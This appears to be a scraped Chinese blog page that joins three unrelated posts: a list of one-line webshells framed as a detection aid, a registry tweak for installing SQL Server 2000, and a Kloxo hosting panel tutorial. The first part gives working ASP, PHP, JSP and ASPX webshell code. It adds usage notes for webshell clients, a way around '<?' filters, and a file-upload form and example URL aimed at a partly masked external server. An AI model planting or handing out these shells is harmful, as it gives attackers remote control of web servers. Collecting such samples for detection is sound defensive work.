查杀一句话木马

用杀毒软件是无法查出来的,只能用代码批量查找、替换工具,其实dreamweaver就有这个功能,下面给出木马的代码方便查杀。

asp一句话木马

程序代码
<%eval request(“sb”)%>

程序代码
<%execute request(“sb”)%>

程序代码
<%execute(request(“sb”))%>

程序代码
<%execute request(“sb”)%><%'<% loop <%:%>

程序代码
<%'<% loop <%:%><%execute request(“sb”)%>

程序代码
<%execute request(“sb”)'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request(“sb”))</script>

程序代码
%><%Eval(Request(chr(35)))%><%

程序代码
<%eval request(“sb”)%>

程序代码
<%ExecuteGlobal request(“sb”)%>

程序代码
if Request(“sb”)<>”” then ExecuteGlobal request(“sb”) end if
//容错代码
程序代码
<%@LANGUAGE=”JAVASCRIPT” CODEPAGE=”65001″%>
<%
var lcx = {‘名字’ : Request.form(‘#’), ‘性别’ : eval, ‘年龄’ : ’18’, ‘昵称’ : ‘请叫我一声老大’};
lcx.性别((lcx.名字)+”);
%>

//使用冰狐一句话客户端链接

程序代码
<%
Set o = Server.CreateObject(“ScriptControl”)
o.language = “vbscript”
o.addcode(Request(“SubCode”)) ‘参数SubCode作为过程代码
o.run “e”,Server,Response,Request,Application,Session,Error ‘参数名e 调用之,同时压入6个基对象作为参数
%>

调用示例:
程序代码
http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29
php一句话

程序代码
<?php eval($_POST[sb])?>

程序代码
<?php @eval($_POST[sb])?>
//容错代码
程序代码
<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST[‘sa’]($_POST[‘sb’]);?>

程序代码
<?$_POST[‘sa’]($_POST[‘sb’],$_POST[‘sc’])?>

程序代码
<?php
@preg_replace(“/[email]/e”,$_POST[‘h’],”error”);
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在”配置”一栏输入
程序代码
<O>h=@eval($_POST[c]);</O>

程序代码
<script language=”php”>@eval($_POST[sb])</script>
//绕过<?限制的一句话

JSP一句话

程序代码
<%
if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());
%>

提交客户端

程序代码
<form action=”http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp” method=”post”>
<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
<input type=submit value=”提交”>
</form>

ASPX一句话
程序代码
<%@ Page Language=”Jscript”%><%eval(Request.Item[“pass”],”unsafe”);%>

程序代码
<%@ Page Language=”Jscript” validateRequest=”false” %><%Response.Write(eval(Request.Item[“w”],”unsafe”));%>
//Jscript的asp.net一句话

程序代码
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request[“f”]) ); }%>
//C#的asp.net一句话

程序代码
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request(“f”)) ) %>
VB的asp.net一句话

解决安装SQL2000提示无法验证产品密钥

在开始>运行>输入“regedit”; 打开注册表编辑器。
找到
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
将SafeDLLSearchMode的DWORD值并将值从 1 更改为 0。
如果SafeDLLSearchMode值不存在, 新建一个DWORD类型的SafeDLLSearchMode键值。默认值就是0。
重新启动 SQL Server 2000 安装,这时就不会出现提示“无法验证产品密钥”。
应用最新 SQL ServicePack(SP4) 然后重新启动服务器即可。

kloxo面板使用教程

1.设置中文,kloxo面板默认是英文的,在taobao.rockszq.com开通后有安装中文包。但是需要进入面板手工设置语言

请访问  http://你的IP:7778/   进行面板的语言设置,默认账号密码是admin,登陆后即提示修改,修改密码后进入。

在Appearance -> Language里选择 Chinese,   然后点击update确认,面板就变成中文界面了!

201009301117380086

 

2.创建DNS模板

登录kloxo后台,点击左边“高级”  下面的 “域名” 链接,这时候,会提示需要您创建一个“dns模板”

先找到您的域名的dns是什么,准备好。一般您的域名在哪里注册的,就可以在注册商的域名控制面板出找到您域名的dns。下图假设我要绑定的域名 www.rockszq.com 的域名dns为ns1.rockszq.com:

201009301121100623

3.绑定域名

输入你要绑定的域名,例如 ctohome.com  注意,这里不要输入www,系统会自动绑定带www的域名,例如上面输入rockszq.com,那么系统会自动绑定 www.rockszq.com 这个域名。

第二要注意,请去掉“ 启用状态记录”的勾,不然日志文件会把你的空间占满,让系统出问题。

然后,点击“add”,就添加好域名了。

201009301125170762

 

4.上传文件

用FTP软件如:flashfxp,服务器就是你的IP地址,登录名就是你绑定的域名,如上图就是 rockszq.com (后面的.com别漏掉了),密码默认就是你的kloxo面板密码.

5.使得网站能够访问

解析域名到VPS IP 。添加一个新的网站。然后重启WEB服务。

登录kloxo后台=》左边:服务器linux =》 服务=》 apache 蓝色的圆点,第2个是停止,第1个是启动。(如下图阴影处)

201009301132020112

 

6.开设数据库

网页 & 邮件 & 数据库——数据库管理,设置root密码

数据库密码要英文字母混合,8位字符以上。建议用生成的。

设置完毕后,在域名——数据库中开设MYSQL数据库

201009301204423737